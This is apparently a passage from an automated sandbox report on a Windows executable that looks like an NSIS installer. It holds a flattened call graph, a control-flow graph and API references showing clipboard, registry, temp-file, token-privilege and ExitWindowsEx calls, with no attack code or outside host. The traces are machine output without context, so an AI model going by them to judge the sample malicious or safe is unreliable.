4056fb GetDlgItem SendMessageW 4962->4964 4967 4056ea 4963->4967 4968 4056dd ShowWindow 4963->4968 4964->4948 4970 405722 SendMessageW SendMessageW 4964->4970 4965->4948 4969 40587d 4965->4969 4966->4965 4977 404379 SendMessageW 4967->4977 4968->4967 4971 405899 SendMessageW 4969->4971 4970->4948 4971->4971 4972 4058b6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4971->4972 4974 4058db SendMessageW 4972->4974 4974->4974 4975 405904 GlobalUnlock SetClipboardData CloseClipboard 4974->4975 4975->4948 4976->4936 4977->4964 4978->4937 5506 402596 5507 402d7e 17 API calls 5506->5507 5508 4025a0 5507->5508 5509 402d1c 17 API calls 5508->5509 5510 4025a9 5509->5510 5511 4025d1 RegEnumValueW 5510->5511 5512 4025c5 RegEnumKeyW 5510->5512 5514 402925 5510->5514 5513 4025e6 RegCloseKey 5511->5513 5512->5513 5513->5514 5516 401d17 5517 402d1c 17 API calls 5516->5517 5518 401d1d IsWindow 5517->5518 5519 401a20 5518->5519 5520 7435166d 5521 74351516 GlobalFree 5520->5521 5524 74351685 5521->5524 5522 743516cb GlobalFree 5523 743516a0 5523->5522 5524->5522 5524->5523 5525 743516b7 VirtualFree 5524->5525 5525->5522 4988 401b9b 4989 401bec 4988->4989 4994 401ba8 4988->4994 4990 401bf1 4989->4990 4991 401c16 GlobalAlloc 4989->4991 5001 402395 4990->5001 5009 4063ee lstrcpynW 4990->5009 4993 40642b 17 API calls 4991->4993 4992 40642b 17 API calls 4995 40238f 4992->4995 4997 401c31 4993->4997 4994->4997 4998 401bbf 4994->4998 4995->5001 5002 405a54 MessageBoxIndirectW 4995->5002 4997->4992 4997->5001 5007 4063ee lstrcpynW 4998->5007 4999 401c03 GlobalFree 4999->5001 5002->5001 5003 401bce 5008 4063ee lstrcpynW 5003->5008 5005 401bdd 5010 4063ee lstrcpynW 5005->5010 5007->5003 5008->5005 5009->4999 5010->5001 5526 402b9d SendMessageW 5527 402bc2 5526->5527 5528 402bb7 InvalidateRect 5526->5528 5528->5527 5529 40149e 5530 402395 5529->5530 5531 4014ac PostQuitMessage 5529->5531 5531->5530 5532 743516d4 5533 74351703 5532->5533 5534 74351b5f 22 API calls 5533->5534 5535 7435170a 5534->5535 5536 74351711 5535->5536 5537 7435171d 5535->5537 5538 74351272 2 API calls 5536->5538 5539 74351744 5537->5539 5540 74351727 5537->5540 5548 7435171b 5538->5548 5542 7435176e 5539->5542 5543 7435174a 5539->5543 5541 7435153d 3 API calls 5540->5541 5545 7435172c 5541->5545 5544 7435153d 3 API calls 5542->5544 5546 743515b4 3 API calls 5543->5546 5544->5548 5549 743515b4 3 API calls 5545->5549 5547 7435174f 5546->5547 5550 74351272 2 API calls 5547->5550 5551 74351732 5549->5551 5552 74351755 GlobalFree 5550->5552 5553 74351272 2 API calls 5551->5553 5552->5548 5554 74351769 GlobalFree 5552->5554 5555 74351738 GlobalFree 5553->5555 5554->5548 5555->5548 4257 4034a2 SetErrorMode GetVersion 4258 4034e1 4257->4258 4259 4034e7 4257->4259 4260 4067e3 5 API calls 4258->4260 4261 406773 3 API calls 4259->4261 4260->4259 4262 4034fd lstrlenA 4261->4262 4262->4259 4263 40350d 4262->4263 4264 4067e3 5 API calls 4263->4264 4265 403514 4264->4265 4266 4067e3 5 API calls 4265->4266 4267 40351b 4266->4267 4268 4067e3 5 API calls 4267->4268 4269 403527 #17 OleInitialize SHGetFileInfoW 4268->4269 4347 4063ee lstrcpynW 4269->4347 4272 403573 GetCommandLineW 4348 4063ee lstrcpynW 4272->4348 4274 403585 4275 405cf0 CharNextW 4274->4275 4276 4035aa CharNextW 4275->4276 4277 4036d4 GetTempPathW 4276->4277 4285 4035c3 4276->4285 4349 403471 4277->4349 4279 4036ec 4280 4036f0 GetWindowsDirectoryW lstrcatW 4279->4280 4281 403746 DeleteFileW 4279->4281 4282 403471 12 API calls 4280->4282 4359 403015 GetTickCount GetModuleFileNameW 4281->4359 4286 40370c 4282->4286 4283 405cf0 CharNextW 4283->4285 4285->4283 4291 4036bf 4285->4291 4293 4036bd 4285->4293 4286->4281 4287 403710 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4286->4287 4292 403471 12 API calls 4287->4292 4288 40380d 4446 4039e3 4288->4446 4289 40375a 4289->4288 4294 4037fd 4289->4294 4298 405cf0 CharNextW 4289->4298 4443 4063ee lstrcpynW 4291->4443 4296 40373e 4292->4296 4293->4277 4387 403abd 4294->4387 4296->4281 4296->4288 4311 403779 4298->4311 4300 403947 4303 4039cb ExitProcess 4300->4303 4304 40394f GetCurrentProcess OpenProcessToken 4300->4304 4301 403827 4453 405a54 4301->4453 4309 403967 LookupPrivilegeValueW AdjustTokenPrivileges 4304->4309 4310 40399b 4304->4310 4307 4037d7 4312 405dcb 18 API calls 4307->4312 4308 40383d 4313 4059bf 5 API calls 4308->4313 4309->4310 4314 4067e3 5 API calls 4310->4314 4311->4307 4311->4308 4315 4037e3 4312->4315 4316 403842 lstrcatW 4313->4316 4317 4039a2 4314->4317 4315->4288 4444 4063ee lstrcpynW 4315->4444 4318 403853 lstrcatW 4316->4318 4319 40385e lstrcatW lstrcmpiW 4316->4319 4320 4039b7 ExitWindowsEx 4317->4320 4321 4039c4 4317->4321 4318->4319 4319->4288 4323 40387a 4319->4323 4320->4303 4320->4321 4462 40140b 4321->4462 4326 403886 4323->4326 4327 40387f 4323->4327 4325 4037f2 4445 4063ee lstrcpynW 4325->4445 4328 4059a2 2 API calls 4326->4328 4330 405925 4 API calls 4327->4330 4331 40388b SetCurrentDirectoryW 4328->4331 4332 403884 4330->4332 4333 4038a6 4331->4333 4334 40389b 4331->4334 4332->4331 4458 4063ee lstrcpynW 4333->4458 4457 4063ee lstrcpynW 4334->4457 4337 40642b 17 API calls 4338 4038e5 DeleteFileW 4337->4338 4339 4038f2 CopyFileW 4338->4339 4344 4038b4 4338->4344 4339->4344 4340 40393b 4341 4061b4 36 API calls 4340->4341 4341->4288 4342 4061b4 36 API calls 4342->4344 4343 40642b 17 API calls 4343->4344 4344->4337 4344->4340 4344->4342 4344->4343 4346 403926 CloseHandle 4344->4346 4459 4059d7 CreateProcessW 4344->4459 4346->4344 4347->4272 4348->4274 4350 40669d 5 API calls 4349->4350 4352 40347d 4350->4352 4351 403487 4351->4279 4352->4351 4353 405cc3 3 API calls 4352->4353 4354 40348f 4353->4354 4355 4059a2 2 API calls 4354->4355 4356 403495 4355->4356 4465 405f13 4356->4465 4469 405ee4 GetFileAttributesW CreateFileW 4359->4469 4361 403055 4362 403065 4361->4362 4470 4063ee lstrcpynW 4361->4470 4362->4289 4364 40307b 4365 405d0f 2 API calls 4364->4365 4366 403081 4365->4366 4471 4063ee lstrcpynW 4366->4471 4368 40308c GetFileSize 4369 4030a3 4368->4369 4384 403186 4368->4384 4369->4362 4374 4031f2 4369->4374 4382 402fb1 6 API calls 4369->4382 4369->4384 4504 403444 4369->4504 4371 40318f 4371->4362 4373 4031bf GlobalAlloc 4371->4373 4507 40345a SetFilePointer 4371->4507 4483 40345a SetFilePointer 4373->4483 4378 402fb1 6 API calls 4374->4378 4377 4031da 4484 40324c 4377->4484 4378->4362 4379 4031a8 4380 403444 ReadFile 4379->4380 4383 4031b3 4380->4383 4382->4369 4383->4362 4383->4373 4472 402fb1 4384->4472 4385 4031e6 4385->4362 4385->4385 4386 403223 SetFilePointer 4385->4386 4386->4362 4388 4067e3 5 API calls 4387->4388 4389 403ad1 4388->4389 4390 403ad7 GetUserDefaultUILanguage 4389->4390 4391 403ae9 4389->4391 4513 406335 wsprintfW 4390->4513 4393 4062bc 3 API calls 4391->4393 4395 403b19 4393->4395 4394 403ae7 4514 403d93 4394->4514 4396 403b38 lstrcatW 4395->4396 4397 4062bc 3 API calls 4395->4397 4396->4394 4397->4396 4400 405dcb 18 API calls 4401 403b6a 4400->4401 4402 403bfe 4401->4402 4404 4062bc 3 API calls 4401->4404 4403 405dcb 18 API calls 4402->4403 4405 403c04 4403->4405 4406 403b9c 4404->4406 4407 403c14 LoadImageW 4405->4407 4408 40642b 17 API calls 4405->4408 4406->4402 4411 403bbd lstrlenW 4406->4411 4414 405cf0 CharNextW 4406->4414 4409 403cba 4407->4409 4410 403c3b RegisterClassW 4407->4410 4408->4407 4413 40140b 2 API calls 4409->4413 4412 403c71 SystemParametersInfoW CreateWindowExW 4410->4412 4442 403cc4 4410->4442 4415 403bf1 4411->4415 4416 403bcb lstrcmpiW 4411->4416 4412->4409 4417 403cc0 4413->4417 4419 403bba 4414->4419 4418 405cc3 3 API calls 4415->4418 4416->4415 4420 403bdb GetFileAttributesW 4416->4420 4421 403d93 18 API calls 4417->4421 4417->4442 4422 403bf7 4418->4422 4419->4411 4423 403be7 4420->4423 4424 403cd1 4421->4424 4529 4063ee lstrcpynW 4422->4529 4423->4415 4426 405d0f 2 API calls 4423->4426 4427 403d60 4424->4427 4428 403cdd ShowWindow 4424->4428 4426->4415 4522 405529 OleInitialize 4427->4522 4429 406773 3 API calls 4428->4429 4432 403cf5 4429->4432 4431 403d66 4433 403d82 4431->4433 4434 403d6a 4431->4434 4435 403d03 GetClassInfoW 4432->4435 4437 406773 3 API calls 4432->4437 4436 40140b 2 API calls 4433->4436 4440 40140b 2 API calls 4434->4440 4434->4442 4438 403d17 GetClassInfoW RegisterClassW 4435->4438 4439 403d2d DialogBoxParamW 4435->4439 4436->4442 4437->4435 4438->4439 4441 40140b 2 API calls 4439->4441 4440->4442 4441->4442 4442->4288 4443->4293 4444->4325 4445->4294 4447 4039fb 4446->4447 4448 4039ed CloseHandle 4446->4448 4541 403a28 4447->4541 4448->4447 4451 405b00 67 API calls 4452 403816 OleUninitialize 4451->4452 4452->4300 4452->4301 4454 405a69 4453->4454 4455 403835 ExitProcess 4454->4455 4456 405a7d MessageBoxIndirectW 4454->4456 4456->4455 4457->4333 4458->4344 4460 405a16 4459->4460 4461 405a0a CloseHandle 4459->4461 4460->4344 4461->4460 4463 401389 2 API calls 4462->4463 4464 401420 4463->4464 4464->4303 4466 405f20 GetTickCount GetTempFileNameW 4465->4466 4467 4034a0 4466->4467 4468 405f56 4466->4468 4467->4279 4468->4466 4468->4467 4469->4361 4470->4364 4471->4368 4473 402fd2 4472->4473 4474 402fba 4472->4474 4477 402fe2 GetTickCount 4473->4477 4478 402fda 4473->4478 4475 402fc3 DestroyWindow 4474->4475 4476 402fca 4474->4476 4475->4476 4476->4371 4480 402ff0 CreateDialogParamW ShowWindow 4477->4480 4481 403013 4477->4481 4508 40681f 4478->4508 4480->4481 4481->4371 4483->4377 4486 403265 4484->4486 4485 403293 4488 403444 ReadFile 4485->4488 4486->4485 4512 40345a SetFilePointer 4486->4512 4489 40329e 4488->4489 4490 4032b0 GetTickCount 4489->4490 4491 4033dd 4489->4491 4495 4033c7 4489->4495 4490->4495 4503 4032dc 4490->4503 4492 40341f 4491->4492 4496 4033e1 4491->4496 4493 403444 ReadFile 4492->4493 4493->4495 4494 403444 ReadFile 4494->4503 4495->4385 4496->4495 4497 403444 ReadFile 4496->4497 4498 405f96 WriteFile 4496->4498 4497->4496 4498->4496 4499 403332 GetTickCount 4499->4503 4500 403357 MulDiv wsprintfW 4501 405456 24 API calls 4500->4501 4501->4503 4502 405f96 WriteFile 4502->4503 4503->4494 4503->4495 4503->4499 4503->4500 4503->4502 4505 405f67 ReadFile 4504->4505 4506 403457 4505->4506 4506->4369 4507->4379 4509 40683c PeekMessageW 4508->4509 4510 406832 DispatchMessageW 4509->4510 4511 402fe0 4509->4511 4510->4509 4511->4371 4512->4485 4513->4394 4515 403da7 4514->4515 4530 406335 wsprintfW 4515->4530 4517 403e18 4531 403e4c 4517->4531 4519 403b48 4519->4400 4520 403e1d 4520->4519 4521 40642b 17 API calls 4520->4521 4521->4520 4534 404390 4522->4534 4524 405573 4525 404390 SendMessageW 4524->4525 4526 405585 OleUninitialize 4525->4526 4526->4431 4527 40554c 4527->4524 4537 401389 4527->4537 4529->4402 4530->4517 4532 40642b 17 API calls 4531->4532 4533 403e5a SetWindowTextW 4532->4533 4533->4520 4535 4043a8 4534->4535 4536 404399 SendMessageW 4534->4536 4535->4527 4536->4535 4539 401390 4537->4539 4538 4013fe 4538->4527 4539->4538 4540 4013cb MulDiv SendMessageW 4539->4540 4540->4539 4542 403a36 4541->4542 4543 403a3b FreeLibrary GlobalFree 4542->4543 4544 403a00 4542->4544 4543->4543 4543->4544 4544->4451 4545 402522 4556 402d7e 4545->4556 4548 402d3e 17 API calls 4549 402535 4548->4549 4550 402540 RegQueryValueExW 4549->4550 4553 402925 4549->4553 4551 402560 4550->4551 4552 402566 RegCloseKey 4550->4552 4551->4552 4561 406335 wsprintfW 4551->4561 4552->4553 4557 402d3e 17 API calls 4556->4557 4558 402d95 4557->4558 4559 40625b RegOpenKeyExW 4558->4559 4560 40252c 4559->4560 4560->4548 4561->4552 5556 4021a2 5557 402d3e 17 API calls 5556->5557 5558 4021a9 5557->5558 5559 402d3e 17 API calls 5558->5559 5560 4021b3 5559->5560 5561 402d3e 17 API calls 5560->5561 5562 4021bd 5561->5562 5563 402d3e 17 API calls 5562->5563 5564 4021c7 5563->5564 5565 402d3e 17 API calls 5564->5565 5567 4021d1 5565->5567 5566 402210 CoCreateInstance 5570 40222f 5566->5570 5567->5566 5568 402d3e 17 API calls 5567->5568 5568->5566 5569 401423 24 API calls 5571 4022ee 5569->5571 5570->5569 5570->5571 5572 4015a3 5573 402d3e 17 API calls 5572->5573 5574 4015aa SetFileAttributesW 5573->5574 5575 4015bc 5574->5575 5576 401fa4 5577 402d3e 17 API calls 5576->5577 5578 401faa 5577->5578 5579 405456 24 API calls 5578->5579 5580 401fb4 5579->5580 5581 4059d7 2 API calls 5580->5581 5582 401fba 5581->5582 5584 40688e 5 API calls 5582->5584 5585 402925 5582->5585 5587 401fdd CloseHandle 5582->5587 5586 401fcf 5584->5586 5586->5587 5589 406335 wsprintfW 5586->5589 5587->5585 5589->5587 4562 743529df 4563 74352a2f 4562->4563 4564 743529ef VirtualProtect 4562->4564 4564->4563 5590 40202a 5591 402d3e 17 API calls 5590->5591 5592 402031 5591->5592 5593 4067e3 5 API calls 5592->5593 5594 402040 5593->5594 5595 4020c4 5594->5595 5596 40205c GlobalAlloc 5594->5596 5596->5595 5597 402070 5596->5597 5598 4067e3 5 API calls 5597->5598 5599 402077 5598->5599 5600 4067e3 5 API calls 5599->5600 5601 402081 5600->5601 5601->5595 5605 406335 wsprintfW 5601->5605 5603 4020b6 5606 406335 wsprintfW 5603->5606 5605->5603 5606->5595 5607 4023aa 5608 4023b2 5607->5608 5610 4023b8 5607->5610 5609 402d3e 17 API calls 5608->5609 5609->5610 5612 4023c6 5610->5612 5613 402d3e 17 API calls 5610->5613 5611 4023d4 5615 402d3e 17 API calls 5611->5615 5612->5611 5614 402d3e 17 API calls 5612->5614 5613->5612 5614->5611 5616 4023dd WritePrivateProfileStringW 5615->5616 5617 402f2b 5618 402f3d SetTimer 5617->5618 5621 402f56 5617->5621 5618->5621 5619 402fab 5620 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5620->5619 5621->5619 5621->5620 4659 40242c 4660 402434 4659->4660 4661 40245f 4659->4661 4663 402d7e 17 API calls 4660->4663 4662 402d3e 17 API calls 4661->4662 4664 402466 4662->4664 4665 40243b 4663->4665 4671 402dfc 4664->4671 4666 402445 4665->4666 4669 402473 4665->4669 4668 402d3e 17 API calls 4666->4668 4670 40244c RegDeleteValueW RegCloseKey 4668->4670 4670->4669 4672 402e09 4671->4672 4673 402e10 4671->4673 4672->4669 4673->4672 4675 402e41 4673->4675 4676 40625b RegOpenKeyExW 4675->4676 4677 402e6f 4676->4677 4678 402f24 4677->4678 4679 402e79 4677->4679 4678->4672 4680 402ea2 4679->4680 4681 402e7f RegEnumValueW 4679->4681 4682 402f09 RegCloseKey 4680->4682 4683 402ede RegEnumKeyW 4680->4683 4684 402ee7 RegCloseKey 4680->4684 4686 402e41 6 API calls 4680->4686 4681->4680 4681->4682 4682->4678 4683->4680 4683->4684 4685 4067e3 5 API calls 4684->4685 4687 402ef7 4685->4687 4686->4680 4688 402f19 4687->4688 4689 402efb RegDeleteKeyW 4687->4689 4688->4678 4689->4678 5622 743518d9 5624 743518fc 5622->5624 5623 74351943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5626 74351272 2 API calls 5623->5626 5624->5623 5625 74351931 GlobalFree 5624->5625 5625->5623 5627 74351ace GlobalFree GlobalFree 5626->5627 5628 74351058 5630 74351074 5628->5630 5629 743510dd 5630->5629 5631 74351516 GlobalFree 5630->5631 5632 74351092 5630->5632 5631->5632 5633 74351516 GlobalFree 5632->5633 5634 743510a2 5633->5634 5635 743510b2 5634->5635 5636 743510a9 GlobalSize 5634->5636 5637 743510b6 GlobalAlloc 5635->5637 5639 743510c7 5635->5639 5636->5635 5638 7435153d 3 API calls 5637->5638 5638->5639 5640 743510d2 GlobalFree 5639->5640 5640->5629 5641 401a30 5642 402d3e 17 API calls 5641->5642 5643 401a39 ExpandEnvironmentStringsW 5642->5643 5644 401a4d 5643->5644 5646 401a60 5643->5646 5645 401a52 lstrcmpW 5644->5645 5644->5646 5645->5646 5647 404db1 GetDlgItem GetDlgItem 5648 404e05 7 API calls 5647->5648 5656 40502f 5647->5656 5649 404ea2 SendMessageW 5648->5649 5650 404eaf DeleteObject 5648->5650 5649->5650 5651 404eba 5650->5651 5653 404ef1 5651->5653 5655 40642b 17 API calls 5651->5655 5652 405117 5654 4051c0 5652->5654 5662 40516d SendMessageW 5652->5662 5690 405022 5652->5690 5657 404344 18 API calls 5653->5657 5658 4051d5 5654->5658 5659 4051c9 SendMessageW 5654->5659 5660 404ed3 SendMessageW SendMessageW 5655->5660 5656->5652 5665 404cff 5 API calls 5656->5665 5675 4050a1 5656->5675 5661 404f05 5657->5661 5670 4051e7 ImageList_Destroy 5658->5670 5671 4051ee 5658->5671 5676 4051fe 5658->5676 5659->5658 5660->5651 5666 404344 18 API calls 5661->5666 5668 405182 SendMessageW 5662->5668 5662->5690 5663 405109 SendMessageW 5663->5652 5664 4043ab 8 API calls 5669 4053c3 5664->5669 5665->5675 5679 404f16 5666->5679 5667 405377 5677 405389 ShowWindow GetDlgItem ShowWindow 5667->5677 5667->5690 5673 405195 5668->5673 5670->5671 5674 4051f7 GlobalFree 5671->5674 5671->5676 5672 404ff1 GetWindowLongW SetWindowLongW 5678 40500a 5672->5678 5684 4051a6 SendMessageW 5673->5684 5674->5676 5675->5652 5675->5663 5676->5667 5689 404d7f 4 API calls 5676->5689 5693 405239 5676->5693 5677->5690 5680 405027 5678->5680 5681 40500f ShowWindow 5678->5681 5679->5672 5683 404f69 SendMessageW 5679->5683 5685 404fec 5679->5685 5687 404fa7 SendMessageW 5679->5687 5688 404fbb SendMessageW 5679->5688 5700 404379 SendMessageW 5680->5700 5699 404379 SendMessageW 5681->5699 5683->5679 5684->5654 5685->5672 5685->5678 5687->5679 5688->5679 5689->5693 5690->5664 5691 405343 5692 40534d InvalidateRect 5691->5692 5695 405359 5691->5695 5692->5695 5694 405267 SendMessageW 5693->5694 5696 40527d 5693->5696 5694->5696 5695->5667 5701 404cba 5695->5701 5696->5691 5698 4052f1 SendMessageW SendMessageW 5696->5698 5698->5696 5699->5690 5700->5656 5704 404bf1 5701->5704 5703 404ccf 5703->5667 5705 404c0a 5704->5705 5706 40642b 17 API calls 5705->5706 5707 404c6e 5706->5707 5708 40642b 17 API calls 5707->5708 5709 404c79 5708->5709 5710 40642b 17 API calls 5709->5710 5711 404c8f lstrlenW wsprintfW SetDlgItemTextW 5710->5711 5711->5703 5717 4044b4 lstrlenW 5718 4044d3 5717->5718 5719 4044d5 WideCharToMultiByte 5717->5719 5718->5719 5720 404835 5721 404861 5720->5721 5722 404872 5720->5722 5781 405a38 GetDlgItemTextW 5721->5781 5724 40487e GetDlgItem 5722->5724 5729 4048dd 5722->5729 5727 404892 5724->5727 5725 4049c1 5730 404b70 5725->5730 5783 405a38 GetDlgItemTextW 5725->5783 5726 40486c 5728 40669d 5 API calls 5726->5728 5732 4048a6 SetWindowTextW 5727->5732 5733 405d6e 4 API calls 5727->5733 5728->5722 5729->5725 5729->5730 5734 40642b 17 API calls 5729->5734 5737 4043ab 8 API calls 5730->5737 5736 404344 18 API calls 5732->5736 5738 40489c 5733->5738 5739 404951 SHBrowseForFolderW 5734->5739 5735 4049f1 5740 405dcb 18 API calls 5735->5740 5741 4048c2 5736->5741 5742 404b84 5737->5742 5738->5732 5746 405cc3 3 API calls 5738->5746 5739->5725 5743 404969 CoTaskMemFree 5739->5743 5744 4049f7 5740->5744 5745 404344 18 API calls 5741->5745 5747 405cc3 3 API calls 5743->5747 5784 4063ee lstrcpynW 5744->5784 5748 4048d0 5745->5748 5746->5732 5749 404976 5747->5749 5782 404379 SendMessageW 5748->5782 5752 4049ad SetDlgItemTextW 5749->5752 5757 40642b 17 API calls 5749->5757 5752->5725 5753 4048d6 5755 4067e3 5 API calls 5753->5755 5754 404a0e 5756 4067e3 5 API calls 5754->5756 5755->5729 5763 404a15 5756->5763 5758 404995 lstrcmpiW 5757->5758 5758->5752 5761 4049a6 lstrcatW 5758->5761 5759 404a56 5785 4063ee lstrcpynW 5759->5785 5761->5752 5762 404a5d 5764 405d6e 4 API calls 5762->5764 5763->5759 5767 405d0f 2 API calls 5763->5767 5769 404aae 5763->5769 5765 404a63 GetDiskFreeSpaceW 5764->5765 5768 404a87 MulDiv 5765->5768 5765->5769 5767->5763 5768->5769 5770 404b1f 5769->5770 5772 404cba 20 API calls 5769->5772 5771 404b42 5770->5771 5773 40140b 2 API calls 5770->5773 5786 404366 KiUserCallbackDispatcher 5771->5786 5774 404b0c 5772->5774 5773->5771 5776 404b21 SetDlgItemTextW 5774->5776 5777 404b11 5774->5777 5776->5770 5779 404bf1 20 API calls 5777->5779 5778 404b5e 5778->5730 5780 40478e SendMessageW 5778->5780 5779->5770 5780->5730 5781->5726 5782->5753 5783->5735 5784->5754 5785->5762 5786->5778 5787 401735 5788 402d3e 17 API calls 5787->5788 5789 40173c SearchPathW 5788->5789 5790 401757 5789->5790 5791 402636 5792 402665 5791->5792 5793 40264a 5791->5793 5795 402695 5792->5795 5796 40266a 5792->5796 5794 402d1c 17 API calls 5793->5794 5804 402651 5794->5804 5798 402d3e 17 API calls 5795->5798 5797 402d3e 17 API calls 5796->5797 5799 402671 5797->5799 5800 40269c lstrlenW 5798->5800 5808 406410 WideCharToMultiByte 5799->5808 5800->5804 5802 402685 lstrlenA 5802->5804 5803 4026c9 5805 405f96 WriteFile 5803->5805 5807 4026df 5803->5807 5804->5803 5806 405fc5 5 API calls 5804->5806 5804->5807 5805->5807 5806->5803 5808->5802 5809 4014b8 5810 4014be 5809->5810 5811 401389 2 API calls 5810->5811 5812 4014c6 5811->5812 5813 401d38 5814 402d1c 17 API calls 5813->5814 5815 401d3f 5814->5815 5816 402d1c 17 API calls 5815->5816 5817 401d4b GetDlgItem 5816->5817 5818 402630 5817->5818 5819 4028bb 5820 4028c1 5819->5820 5821 402bc2 5820->5821 5822 4028c9 FindClose 5820->5822 5822->5821 5823 74352349 5824 743523b3 5823->5824 5825 743523be GlobalAlloc 5824->5825 5826 743523dd 5824->5826 5825->5824

                                            Executed Functions

                                            Function 004034A2 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410stringfilecomCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 0 4034a2-4034df SetErrorMode GetVersion 1 4034e1-4034e9 call 4067e3 0->1 2 4034f2 0->2 1->2 8 4034eb 1->8 4 4034f7-40350b call 406773 lstrlenA 2->4 9 40350d-403529 call 4067e3 * 3 4->9 8->2 16 40353a-403599 #17 OleInitialize SHGetFileInfoW call 4063ee GetCommandLineW call 4063ee 9->16 17 40352b-403531 9->17 24 4035a3-4035bd call 405cf0 CharNextW 16->24 25 40359b-4035a2 16->25 17->16 22 403533 17->22 22->16 28 4035c3-4035c9 24->28 29 4036d4-4036ee GetTempPathW call 403471 24->29 25->24 31 4035d2-4035d6 28->31 32 4035cb-4035d0 28->32 36 4036f0-40370e GetWindowsDirectoryW lstrcatW call 403471 29->36 37 403746-403760 DeleteFileW call 403015 29->37 34 4035d8-4035dc 31->34 35 4035dd-4035e1 31->35 32->31 32->32 34->35 38 4036a0-4036ad call 405cf0 35->38 39 4035e7-4035ed 35->39 36->37 54 403710-403740 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403471 36->54 57 403811-403821 call 4039e3 OleUninitialize 37->57 58 403766-40376c 37->58 55 4036b1-4036b7 38->55 56 4036af-4036b0 38->56 43 403608-403641 39->43 44 4035ef-4035f7 39->44 45 403643-403648 43->45 46 40365e-403698 43->46 50 4035f9-4035fc 44->50 51 4035fe 44->51 45->46 52 40364a-403652 45->52 46->38 53 40369a-40369e 46->53 50->43 50->51 51->43 60 403654-403657 52->60 61 403659 52->61 53->38 62 4036bf-4036cd call 4063ee 53->62 54->37 54->57 55->28 64 4036bd 55->64 56->55 73 403947-40394d 57->73 74 403827-403837 call 405a54 ExitProcess 57->74 65 403801-403808 call 403abd 58->65 66 403772-40377d call 405cf0 58->66 60->46 60->61 61->46 69 4036d2 62->69 64->69 76 40380d 65->76 80 4037cb-4037d5 66->80 81 40377f-4037b4 66->81 69->29 78 4039cb-4039d3 73->78 79 40394f-403965 GetCurrentProcess OpenProcessToken 73->79 76->57 83 4039d5 78->83 84 4039d9-4039dd ExitProcess 78->84 88 403967-403995 LookupPrivilegeValueW AdjustTokenPrivileges 79->88 89 40399b-4039a9 call 4067e3 79->89 86 4037d7-4037e5 call 405dcb 80->86 87 40383d-403851 call 4059bf lstrcatW 80->87 82 4037b6-4037ba 81->82 90 4037c3-4037c7 82->90 91 4037bc-4037c1 82->91 83->84 86->57 99 4037e7-4037fd call 4063ee * 2 86->99 100 403853-403859 lstrcatW 87->100 101 40385e-403878 lstrcatW lstrcmpiW 87->101 88->89 102 4039b7-4039c2 ExitWindowsEx 89->102 103 4039ab-4039b5 89->103 90->82 95 4037c9 90->95 91->90 91->95 95->80 99->65 100->101 101->57 106 40387a-40387d 101->106 102->78 104 4039c4-4039c6 call 40140b 102->104 103->102 103->104 104->78 109 403886 call 4059a2 106->109 110 40387f-403884 call 405925 106->110 115 40388b-403899 SetCurrentDirectoryW 109->115 110->115 118 4038a6-4038cf call 4063ee 115->118 119 40389b-4038a1 call 4063ee 115->119 123 4038d4-4038f0 call 40642b DeleteFileW 118->123 119->118 126 403931-403939 123->126 127 4038f2-403902 CopyFileW 123->127 126->123 128 40393b-403942 call 4061b4 126->128 127->126 129 403904-403924 call 4061b4 call 40642b call 4059d7 127->129 128->57 129->126 138 403926-40392d CloseHandle 129->138 138->126
                                            APIs
                                            • SetErrorMode.KERNELBASE ref: 004034C5
                                            • GetVersion.KERNEL32 ref: 004034CB
                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
                                            • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040353B
                                            • OleInitialize.OLE32(00000000), ref: 00403542
                                            • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
                                            • GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403573
                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000020,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,?,00000007,00000009,0000000B), ref: 004035AB
                                              • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                              • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E5
                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036F6
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403702
                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403716
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371E
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040372F
                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403737
                                            • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040374B
                                              • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                            • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403816
                                            • ExitProcess.KERNEL32 ref: 00403837
                                            • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Ntwph4urc1.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040384A
